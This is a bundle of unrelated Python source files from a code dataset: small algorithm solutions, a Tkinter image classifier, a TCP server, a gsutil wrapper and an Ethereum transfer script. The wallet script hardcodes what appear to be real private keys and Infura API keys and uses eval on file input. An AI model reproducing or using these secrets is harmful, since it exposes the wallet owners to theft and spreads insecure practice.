None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef health(self):\n\t\treturn self.get_field_int('UNIT_FIELD_HEALTH')\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef level(self):\n\t\treturn self.get_field_int('UNIT_FIELD_LEVEL')\n\t\t\n\t","sub_path":"objects/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"572033210","text":"\"\"\"\nPower Of Two Integers\n=====================\n\nGiven a positive integer which fits in a 32 bit signed integer, find if it can be expressed as A^P where P > 1 and A > 0. A and P both should be integers.\n\nExample\n\nInput : 4\nOutput : True \nas 2^2 = 4.\n\"\"\"\n\nfrom __future__ import print_function\n\n\ndef is_power(n, k):\n # Returns True if n = k ** p\n # False otherwise\n # Time complexity: log_k(n)\n while True:\n n, rem = divmod(n, k)\n if rem:\n return False\n if n==1:\n return True\n\n\ndef check(n):\n # Checks for every possible dividor if n is a power of it.\n # Time complexity: sum of log_k(n) for k in 2..sqrt(n)\n for k in range(2, int(n ** .5) + 1):\n if is_power(n, k):\n return True\n return False\n\n\nprint(check(72))\n","sub_path":"InterviewBit/Math/PowerOfTwoIntegers.py","file_name":"PowerOfTwoIntegers.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325401292","text":"n,m=map(int,input().split())\na=[[0]*n for i in range(n)]\nfor i in range(m):\n b,k=map(int,input().split())\n a[b-1][k-1]=1\ntimer=[0]\ntin=[0]*n\ntout=[0]*n\nused=[0]*n\np=[0]*n\ncycle=[False]\ndef dfs(v):\n used[v]=1\n timer[0]+=1\n tin[v]=timer[0]\n for i in range(n):\n to=a[v][i]\n if to==1:\n if used[i]==0:\n p[i]=v\n dfs(i)\n elif used[i]==1 and i!=p[v]:\n cycle[0]=True\n timer[0]+=1\n tout[v]=timer[0]\n used[v]=2\ndfs(0)\nfor i in range(len(used)):\n if used[i]==0:\n dfs(i)\n\nif cycle[0]==False:\n d=[]\n for i in range(n):\n d.append([tin[i],tout[i],i])\n d=sorted(d,key=lambda x:x[1],reverse=True)\n for i in d:\n print(i[2]+1,end=\" \")\nelse:\n print(-1)\n\n","sub_path":"sikl.py","file_name":"sikl.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"131857342","text":"import json\nimport numpy as np\nimport tkinter as tk\nfrom tkinter import ttk\nfrom pathlib import Path\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\nfrom tensorflow.keras.applications import mobilenet_v2\nfrom tensorflow.python.keras.preprocessing import image\n\nmodel = mobilenet_v2.MobileNetV2(weights='imagenet') # 加载预训练模型\ninitialdir = Path.cwd() # 初始化目录,可切换为图片Path.home() / 'Pictures'\nimg = None # 当前打开的图片\nwin_result = None # 显示结果的窗口\nclass_trans_path = 'class_trans.json' # 翻译文件路径\nclass_trans = json.load(open(class_trans_path)) if Path(class_trans_path).exists() else {}\n\n\ndef scale(size, width=None, height=None):\n \"\"\"获取按比例缩放后的宽高\"\"\"\n if not width and not height:\n width, height = size\n if not width or not height:\n _width, _height = size\n height = width * _height / _width if width else height\n width = height * _width / _height if height else width\n return int(width), int(height)\n\n\ndef img_resize(event=None):\n \"\"\"显示图片\"\"\"\n global img\n if img:\n _img = img.resize(scale(img.size, height=win.winfo_height()))\n _img = ImageTk.PhotoImage(_img)\n label.config(image=_img)\n label.image = _img\n\n\ndef close_win_result():\n \"\"\"关闭结果窗口\"\"\"\n global win_result\n if win_result:\n try:\n win_result.destroy()\n except:\n pass\n\n\ndef on_closing():\n \"\"\"关闭事件\"\"\"\n if messagebox.askokcancel('关闭', '是否退出程序?'):\n win.destroy()\n close_win_result()\n\n\ndef open_file():\n \"\"\"打开图片\"\"\"\n global initialdir\n global img\n global win_result\n file_path = filedialog.askopenfilename(title='选择图片', initialdir=initialdir,\n filetypes=[('image files', ('.png', '.jpg', '.jpeg', '.gif'))])\n if file_path:\n path = Path(file_path)\n initialdir = path.parent\n img = Image.open(file_path)\n img_resize()\n\n _img = image.load_img(file_path, target_size=(224, 224))\n _img = image.img_to_array(_img)\n _img = np.expand_dims(_img, axis=0)\n _img = mobilenet_v2.preprocess_input(_img)\n pred_class = model.predict(_img)\n n = 10\n top_n = mobilenet_v2.decode_predictions(pred_class, top=n)\n print(path)\n for i in top_n[0]:\n print(i)\n print()\n\n close_win_result()\n win_result = tk.Tk()\n win_result.title(path.name)\n table = ttk.Treeview(win_result, columns=['序号', '对象', '标签', '翻译', '概率'], show='headings')\n table.column('序号', width=100)\n table.column('对象', width=100)\n table.column('标签', width=100)\n table.column('翻译', width=100)\n table.column('概率', width=100)\n table.heading('序号', text='序号')\n table.heading('对象', text='对象')\n table.heading('标签', text='标签')\n table.heading('翻译', text='翻译')\n table.heading('概率', text='概率')\n for i, x in enumerate(top_n[0]):\n index = str(i + 1)\n objectname = x[0]\n classname = x[1]\n transname = class_trans.get(classname, classname)\n table.insert('', i, text=index,\n values=[index, objectname, classname, transname, '{:.2f}%'.format(float(x[2] * 100))])\n table.pack(fill=tk.BOTH, expand=True)\n win_result.mainloop()\n\n\nwin = tk.Tk()\nwin.title('ImageNet图像分类') # 标题\nmenu = tk.Menu(win)\nmenu.add_command(label='打开', command=open_file)\nwin.config(menu=menu)\nlabel = tk.Label(win, text='左上角打开图片')\nlabel.pack(fill=tk.BOTH, expand=True)\nwin.bind('', img_resize)\nwin.geometry('600x300+300+300')\nwin.minsize(200, 200)\nwin.protocol('WM_DELETE_WINDOW', on_closing)\nwin.mainloop()\n","sub_path":"直接调用预训练模型GUI.py","file_name":"直接调用预训练模型GUI.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"430571996","text":"import random\nimport json\nfrom web3 import Web3\n\nMAIN_URL = \"https://mainnet.infura.io/v3/bb055071bba745488eda95512a6d0035\"\nURL = 'https://8cf41633363c49a584fbfb0b556a5927.ropsten.rpc.rivet.cloud/'\nURL = 'wss://ropsten.infura.io/ws/v3/bb055071bba745488eda95512a6d0035'\n\nw3 = Web3(Web3.WebsocketProvider(URL))\n# w3 = Web3(Web3.HTTPProvider(URL))\n\ndef _checking(_addr):\n '''\n ورودی تابع یک استرینگ است که چک میشود ایا ادرس معتبری هست یا خیر\n False یا addrress درنهایت\n خارج میشود\n '''\n if not isinstance(_addr, str):\n print(\"ادرس بد وارد کردی باید یک استرینگ باشه\")\n return False\n try:\n if not w3.isConnected():\n print(\"نت مشکل داره \")\n return False\n addr_ = Web3.toChecksumAddress(_addr)\n if not _addr:\n print(\"ادرس بدی وارد کردی شرمنده تم\")\n return False\n return addr_\n except Exception as e:\n print(e)\n print(\"یه مشکلی وجود داره ×ـ× مثلا نتت ضعیفه\")\n return False\n\n\ndef balance(_addr: str) -> float:\n \"\"\"\n اینجا ادرس خواسته رو به تابع بدید\n توی خروجی یه عدد میده که همون باقیمانده ی حسابش هستش :)\n \"\"\"\n addr_ = _checking(_addr)\n return float(w3.eth.get_balance(addr_) / 10 ** 18)\n\n\ndef transfer(_to_addr: str, _value: float, private_key: str, public_key: str, _nounce: int):\n to_addr_ = _checking(_to_addr)\n public_key = _checking(public_key)\n\n if to_addr_ and public_key:\n try:\n if balance(public_key) < _value:\n print(\"پول ت کمه ، نمیتونی کمک کنی \")\n return False\n p = w3.eth.gas_price\n\n trancation = {\n 'from': public_key,\n 'to': to_addr_,\n \"gas\": \"0x200000\",\n \"gasPrice\": p,\n \"nonce\": _nounce,\n \"value\": int(_value * 10 ** 18),\n }\n raw_trx = w3.eth.account.privateKeyToAccount(\n private_key).sign_transaction(trancation)\n res = w3.eth.send_raw_transaction(raw_trx.rawTransaction).hex()\n return res\n except Exception as e:\n print(e)\n print(\"یک اتفاقی افتاده که من نمیدونم ....\")\n return 0\n\n\n## Testing Functions with my wallet\n\n# _public_key = Web3.toChecksumAddress(\"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\")\n# print(balance(\"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\"))\n# print(balance(\"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\"))\n# _nounce = w3.eth.get_transaction_count(_public_key)\n# print(\n# transfer(\"0x603c7564035A8c0a7eB9a74a76113563ffdbD36F\",\n# 0.01,\n# \"a49443970e8c717e218d312c0a7d1b390bea090cd3809011fd5cb926851f2e2b\",\n# \"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\",\n# _nounce)\n# )\n# _nounce += 1\n#\n# print(\n# transfer(\"0x603c7564035A8c0a7eB9a74a76113563ffdbD36F\",\n# 0.01,\n# \"a49443970e8c717e218d312c0a7d1b390bea090cd3809011fd5cb926851f2e2b\",\n# \"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\",\n# _nounce)\n# )\n\nnavid_wallet = \"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\"\nnavid_private_key = \"a49443970e8c717e218d312c0a7d1b390bea090cd3809011fd5cb926851f2e2b\"\n\nmy_wallet = \"0x9200e872f21B28E61600a62A3628ff30688e107C\"\nmy_private_key = \"e3aa1cb4960222f0731a884d96c377fa00ba64424fd0bb76ba97bb7fe272d937\"\n_public_key = Web3.toChecksumAddress(my_wallet)\n_nounce = w3.eth.get_transaction_count(_public_key)\n\nwallets = eval(open('wallets.json', 'r').read())\n\n\nrandom_list = list()\nrandom_balances = list()\nfor i in range(20):\n index = random.randint(0, len(wallets)-1)\n\n random_list.append(wallets[index])\n random_balances.append(balance(wallets[index]))\n\n\nwallets_and_their_balances = dict(zip(random_list, random_balances))\nmean = sum(random_balances)/len(random_balances)\n\nprint(mean)\nprint(wallets_and_their_balances)\n\ntransactions = list()\nfor k, v in wallets_and_their_balances.items():\n if v < mean/10:\n transaction = transfer(k, 0.05, my_private_key, my_wallet, _nounce)\n _nounce += 1\n transactions.append('-'*4+ ' > ' + str(transaction) + '\\n')\n\nf = open('transactions.txt', 'w', encoding='UTF-8')\nf.writelines(transactions)\nf.close()\n\nprint(balance(my_wallet))\n\n# by Shervin Hasanzadeh\n","sub_path":"block_chain_wallet.py","file_name":"block_chain_wallet.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"423510119","text":"# pprint_arbitrary_object.py\n\nfrom pprint import pprint\n\n\nclass node:\n\n def __init__(self, name, contents=[]):\n self.name = name\n self.contents = contents[:]\n\n def __repr__(self):\n return (\n 'node(' + repr(self.name) + ', ' +\n repr(self.contents) + ')'\n )\n\n\ntrees = [\n node('nodo-1'),\n node('nodo-2', [node('nodo-2-1')]),\n node('nodo-3', [node('nodo-3-1')]),\n]\npprint(trees)\n","sub_path":"dumpscripts/pprint_arbitrary_object.py","file_name":"pprint_arbitrary_object.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"437492439","text":"\n\nfrom xai.brain.wordbase.nouns._islam import _ISLAM\n\n#calss header\nclass _ISLAMS(_ISLAM, ):\n\tdef __init__(self,): \n\t\t_ISLAM.__init__(self)\n\t\tself.name = \"ISLAMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"islam\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_islams.py","file_name":"_islams.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"258940025","text":"import subprocess\n\nclass CloudStorageTransfer():\n def __init__(self, source_uri, destination_uri, parallel=True):\n self.source_uri = source_uri\n self.destination_uri = destination_uri\n self.parallel = parallel\n\n def copy(self, mode=\"cp\",directory=True):\n subcommand = \"\"\n if self.parallel:\n if directory:\n subcommand = \"-m {} -r\".format(mode)\n else:\n subcommand = \"-m {} \".format(mode)\n else:\n if directory:\n subcommand = \"{} -r\".format(mode)\n else:\n subcommand = \"{}\".format(mode)\n\n command = \"\"\"gsutil {} {} {}\"\"\".format(subcommand, self.source_uri, self.destination_uri)\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n print(\"output: {}\" .format(output.decode('utf-8')) , \"error: {}\" .format(error))","sub_path":"airflow/dags/cloudDataTransfer/cloudStorageTransferService.py","file_name":"cloudStorageTransferService.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"3626667","text":"\nclass Solution:\n\t# @param intervals, a list of Intervals\n\t# @param newInterval, a Interval\n\t# @return a list of Interval\n\tdef insert(self, intervals, newInterval):\n\t\tn=len(intervals)\n\t\tif n==0:\n\t\t\treturn [newInterval]\n\n\t\tre=[]\n\t\tfor i in range(n):\n\t\t\tcur=intervals[i]\n\t\t\tif cur.endnewInterval.end:\n\t\t\t\tre.append(newInterval)\n\t\t\t\tnewInterval = cur\n\t\t\telse:\n\t\t\t\tnewInterval.start=min(cur.start, newInterval.start)\n\t\t\t\tnewInterval.end=max(cur.end, newInterval.end)\n\t\tre.append(newInterval)\n\t\treturn re\n","sub_path":"code/InsertInterval.py","file_name":"InsertInterval.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"89726564","text":"''' Server for OOP '''\n\nfrom socket import *\nfrom time import ctime\n\nclass Server:\n ''' Server '''\n\n def __init__(self, host, port, bufsiz=1024):\n ''' Initiate '''\n self.host = host\n self.port = port\n self.addr = (host, port)\n self.bufsiz = bufsiz\n self.tcpserve = socket(AF_INET, SOCK_STREAM)\n self.tcpserve.bind(self.addr)\n\n def startActivity(self):\n ''' Start TCP serve '''\n while True:\n print('waiting for connnection...')\n self.tcpserve, addr = self.tcpserve.accept() # Receive connection from user and return \n print('... connected from: ', addr)\n\n while True:\n data = self.tcpserve.recv(self.bufsiz);\n if not data:\n break\n data = str(data, encoding = 'UTF-8')\n data = '[%s] %s' %(ctime(), data)\n data = bytes(data, encoding = 'UTF-8')\n self.tcpserve.send(data)\n # self.tcpserve.close()\n","sub_path":"Programing for Python/Study/tsTserv_OOP.py","file_name":"tsTserv_OOP.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162508033","text":"# -*- coding: utf-8 -*-\n\nimport fileinput\n\nvals = None\nfor line in fileinput.input():\n vals = [int(x) for x in line.split()]\n\nvals.sort()\n\nif vals[1] % vals[0] == 0:\n print('Sao Multiplos')\nelse:\n print('Nao sao Multiplos')\n","sub_path":"1044/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"268849949","text":"sandwich_orders = [\r\n 'cheese', 'veggie', 'pastrami', 'turkey',\r\n 'pastrami', 'ham', 'pastrami']\r\nfinished_sandwiches = []\r\n\r\nprint(\"Unfortunately, we're all out of pastrami.\")\r\nwhile 'pastrami' in sandwich_orders:\r\n sandwich_orders.remove('pastrami')\r\n\r\nprint(\"\\n\")\r\nwhile sandwich_orders:\r\n current_sandwich = sandwich_orders.pop()\r\n print(\"I'm working on your \" + current_sandwich + \" sandwich.\")\r\n finished_sandwiches.append(current_sandwich)\r\n\r\nprint(\"\\n\")\r\nfor sandwich in finished_sandwiches:\r\n print(\"I made a \" + sandwich + \" sandwich.\")","sub_path":"5.21.py","file_name":"5.21.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"195395927","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .. import base_solver\nfrom ...settings import SDE_TYPES, NOISE_TYPES, LEVY_AREA_APPROXIMATIONS\n\n\nclass Midpoint(base_solver.BaseSDESolver):\n weak_order = 1.0\n sde_type = SDE_TYPES.stratonovich\n noise_types = NOISE_TYPES.all()\n levy_area_approximations = LEVY_AREA_APPROXIMATIONS.all()\n\n def __init__(self, sde, **kwargs):\n self.strong_order = 0.5 if sde.noise_type == NOISE_TYPES.general else 1.0\n super(Midpoint, self).__init__(sde=sde, **kwargs)\n\n def step(self, t0, t1, y0, extra0):\n del extra0\n dt = t1 - t0\n I_k = self.bm(t0, t1)\n\n f, g_prod = self.sde.f_and_g_prod(t0, y0, I_k)\n\n half_dt = 0.5 * dt\n\n t_prime = t0 + half_dt\n y_prime = y0 + half_dt * f + 0.5 * g_prod\n\n f_prime, g_prod_prime = self.sde.f_and_g_prod(t_prime, y_prime, I_k)\n\n y1 = y0 + dt * f_prime + g_prod_prime\n\n return y1, ()\n","sub_path":"torchsde/_core/methods/midpoint.py","file_name":"midpoint.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67074255","text":"'''\n\n4 verticies\n\n\t1 2 3 4\n1 \t0 1\t1 0\n2\t1 0 0 0\n3 1 0 0 1\n4\t0 0 1 0\n\nVerticies from 1 to 4\ncolors = [Red, Green, Blue], k = 2\nLet 1 be 1 --> colors[1] = Red\nLet 2 be 1 --> Error, adjacent element is 1\nLet 2 be 2 --> colors[2] = Green\nLet 3 be 1 --> Error, adjacent element is 1\nLet 3 be 2 --> Colors[2] = Green\nLet 4 be 1 --> Colors[1] = Red\nSuccessfully placed all colors, return True\n\nk = 1\nLet 1 be 1 --> colors[1] = Red\nLet 2 be 1 --> Error, adjacent element is 1\nFalse, exceeded range and still have more elements, return False\n\n'''\n\ndef solve(matrix, k):\n\tcolors = []\n\n\treturn backtrack(matrix, colors, 0, k)\n\n\ndef backtrack(matrix, colors, node, k):\n\tif node >= len(matrix):\n\t\treturn True\n\n\tfor sub_k in range(k):\n\t\tcolors.append(sub_k)\n\t\tif is_valid(matrix, colors):\n\t\t\tif backtrack(matrix, colors, node + 1, k):\n\t\t\t\treturn True\n\t\tcolors.pop()\n\treturn False\n\ndef is_valid(matrix, colors):\n\tfor node in range(len(matrix)):\n\t\tif node > len(colors) - 1:\n\t\t\treturn True\n\t\tindicies = all_adjacent_index(matrix, node)\n\t\tfor idx in indicies:\n\t\t\tif idx > len(colors) - 1:\n\t\t\t\tcontinue\n\t\t\tif colors[node] == colors[idx]:\n\t\t\t\treturn False\n\treturn True\n\ndef all_adjacent_index(matrix, node):\n\treturn [idx for idx, val in enumerate(matrix[node]) if val == 1]\n\n\n#matrix = [[0,1,1,0],[1,0,0,0],[1,0,0,1],[0,0,1,0]]\nmatrix = [[0,1,0,1],[1,0,1,1],[0,1,0,0],[1,1,0,0]]\nk = 3\n\nprint(solve(matrix, k))","sub_path":"Problem_56/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"310857774","text":"# Software License Agreement (BSD License)\n#\n# Copyright (c) 2009, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Willow Garage, Inc. nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\nimport roslib; roslib.load_manifest('test_roslib')\n\nimport os\nimport struct\nimport sys\nimport unittest\n\nimport rosunit\n\nclass RoslibXmlrpcTest(unittest.TestCase):\n \n def test_XmlRpcHandler(self):\n from roslib.xmlrpc import XmlRpcHandler \n # tripwire\n h = XmlRpcHandler()\n # noop\n h._ready('http://localhost:1234')\n def test_XmlRpcNode(self):\n from roslib.xmlrpc import XmlRpcNode\n # not a very comprehensive test (yet)\n #port, handler\n tests = [\n (None, None, None),\n (8080, None, 8080),\n ('8080', None, 8080),\n (u'8080', None, 8080),\n ]\n for port, handler,true_port in tests:\n n = XmlRpcNode(port, handler)\n self.assertEquals(true_port, n.port)\n self.assertEquals(handler, n.handler)\n self.assertEquals(None, n.uri)\n self.assertEquals(None, n.server)\n n.set_uri('http://fake:1234')\n self.assertEquals('http://fake:1234', n.uri) \n\n \nif __name__ == '__main__':\n rosunit.unitrun('test_roslib', 'test_xmlrpc', RoslibXmlrpcTest, coverage_packages=['roslib.xmlrpc'])\n\n","sub_path":"test/test_roslib/test/test_roslib_xmlrpc.py","file_name":"test_roslib_xmlrpc.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453724304","text":"# ##########################################################################\r\n# Author: Manfred Lee\r\n# Objective: Image pre-processing using Keras\r\n# References: keras documentation\r\n# Remark: Images are randomly augmented based on our arguments with the\r\n# use of ImageDataGenerator\r\n# ##########################################################################\r\n\r\n# --------------------------------------------------------------------------\r\n# Set-up\r\n# --------------------------------------------------------------------------\r\n# Import the library\r\nimport keras\r\nfrom keras.datasets import cifar10\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.callbacks import EarlyStopping\r\n\r\n# Load the sample data set\r\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\r\n\r\n# --------------------------------------------------------------------------\r\n# Implementation - The use of ImageDataGenerator combined with CNN\r\n# --------------------------------------------------------------------------\r\ndatagen = ImageDataGenerator(featurewise_center=True,\r\n featurewise_std_normalization=True,\r\n rotation_range=40,\r\n rescale=1./255,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\n# compute quantities required for featurewise normalization\r\n# (std, mean, and principal components if ZCA whitening is applied)\r\ndatagen.fit(X_train)\r\n\r\ny_train = keras.utils.to_categorical(y_train, 10)\r\n\r\n# Construct a simple CNN\r\nmodel = Sequential() # initialize the model\r\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(32, 32, 3)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\nbatch_size = 1024 # Set the batch size for using batch SGD to train the model\r\nepochs = 5 # Set the number of training epochs\r\n\r\n# Specifying the loss function, evaluation metrics and optimizer\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\n# Allow early stopping\r\nearly_stopping = EarlyStopping(monitor='val_loss', patience=3)\r\n\r\n# Fit the model with randomly augmented figures using ImageDataGenerator\r\nmodel.fit_generator(datagen.flow(X_train, y_train, batch_size=1024), steps_per_epoch=len(X_train) / 1024, epochs=epochs)","sub_path":"Data pre-processing/keras/keras - image preprocessing.py","file_name":"keras - image preprocessing.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545186402","text":"import pandas as pd\nfrom configparser import ConfigParser\nimport xml.etree.cElementTree as ET\n\n\ndef add_track(data, vlc_id, root_element):\n track_element = ET.SubElement(root_element[1], \"track\")\n ET.SubElement(track_element, \"location\").text = f'dvb-t://frequency={data[\"frequency\"]}:bandwidth=8'\n ET.SubElement(track_element, \"title\").text = f'{data[\"service_name\"]}'\n extension = ET.SubElement(track_element, \"extension\", attrib={'application': 'http://www.videolan.org/vlc/playlist/0'})\n ET.SubElement(extension, \"vlc:id\").text = f'{vlc_id}'\n ET.SubElement(extension, \"vlc:option\").text = 'dvb_adapter=0'\n ET.SubElement(extension, \"vlc:option\").text = 'live-caching=300'\n ET.SubElement(extension, \"vlc:option\").text = 'sout=#display'\n ET.SubElement(extension, \"vlc:option\").text = 'no-sout-all'\n ET.SubElement(extension, \"vlc:option\").text = 'sout-keep'\n ET.SubElement(extension, \"vlc:option\").text = f'program={data[\"service_id\"]}'\n formatted_tree = ET.ElementTree(root)\n formatted_tree.write(\"filename.xspf\", xml_declaration=True, encoding=\"UTF-8\")\n\n\nconfig = ConfigParser()\nconfig.read('channels_1.conf')\ninfo = {}\nfor section in config.sections():\n info[section] = {k: v for k, v in config.items(section)}\n\ndf = pd.DataFrame(info)\n# print(df)\n\nET.register_namespace('', 'http://xspf.org/ns/0/')\nET.register_namespace('vlc', 'http://www.videolan.org/vlc/playlist/ns/0/')\n\ntree = ET.parse('mine.xspf')\nroot = tree.getroot()\n# tracklist = root.find(\"trackList\")\n# for track in root[1]:\n# print(track.tag)\n# for track_attr in track.iter():\n# print(track_attr, track_attr.text)\n\nfor idx, column in enumerate(df):\n add_track(df[column], idx, root)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"174282249","text":"import sys\r\n\r\nlines = open(sys.argv[1], 'r')\r\nfor line in lines:\r\n line = line.replace('\\n', '').replace('\\r', '')\r\n if len(line) > 0:\r\n number, pattern = line.split(' ')\r\n indexOfPlus = pattern.find('+')\r\n indexOfMinus = pattern.find('-')\r\n if indexOfPlus >= 0:\r\n a = int(number[0:indexOfPlus])\r\n b = int(number[indexOfPlus::])\r\n print(a + b)\r\n else:\r\n a = int(number[0:indexOfMinus])\r\n b = int(number[indexOfMinus::])\r\n print(a - b)\r\n\r\nlines.close()\r\n","sub_path":"Easy/Split The Number/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495629600","text":"#! /bin/env python\n#\n# Michael Gibson 27 April 2015\n# Modified Zeke Arneodo Dec 2017\n# Modified Adrian Foy Sep 2018\n\ndef data_to_result(header, data, data_present):\n \"\"\"Moves the header and data (if present) into a common object.\"\"\"\n \n result = {}\n result['t'] = data['t']\n \n stim_parameters = {}\n stim_parameters['stim_step_size'] = header['stim_step_size']\n stim_parameters['charge_recovery_current_limit'] = header['recovery_current_limit']\n stim_parameters['charge_recovery_target_voltage'] = header['recovery_target_voltage']\n stim_parameters['amp_settle_mode'] = header['amp_settle_mode']\n stim_parameters['charge_recovery_mode'] = header['charge_recovery_mode']\n result['stim_parameters'] = stim_parameters\n \n result['stim_data'] = data['stim_data']\n result['spike_triggers'] = header['spike_triggers']\n result['notes'] = header['notes']\n result['frequency_parameters'] = header['frequency_parameters']\n \n if header['dc_amplifier_data_saved']:\n result['dc_amplifier_data'] = data['dc_amplifier_data']\n \n if header['num_amplifier_channels'] > 0:\n if data_present:\n result['compliance_limit_data'] = data['compliance_limit_data']\n result['charge_recovery_data'] = data['charge_recovery_data']\n result['amp_settle_data'] = data['amp_settle_data']\n \n if header['num_board_dig_out_channels'] > 0:\n result['board_dig_out_channels'] = header['board_dig_out_channels']\n if data_present:\n result['board_dig_out_data'] = data['board_dig_out_data']\n \n if header['num_board_dig_in_channels'] > 0:\n result['board_dig_in_channels'] = header['board_dig_in_channels']\n if data_present:\n result['board_dig_in_data'] = data['board_dig_in_data']\n \n if header['num_board_dac_channels'] > 0:\n result['board_dac_channels'] = header['board_dac_channels']\n if data_present:\n result['board_dac_data'] = data['board_dac_data']\n \n if header['num_board_adc_channels'] > 0:\n result['board_adc_channels'] = header['board_adc_channels']\n if data_present:\n result['board_adc_data'] = data['board_adc_data']\n \n if header['num_amplifier_channels'] > 0:\n result['amplifier_channels'] = header['amplifier_channels']\n if data_present:\n result['amplifier_data'] = data['amplifier_data']\n \n return result","sub_path":"Stim 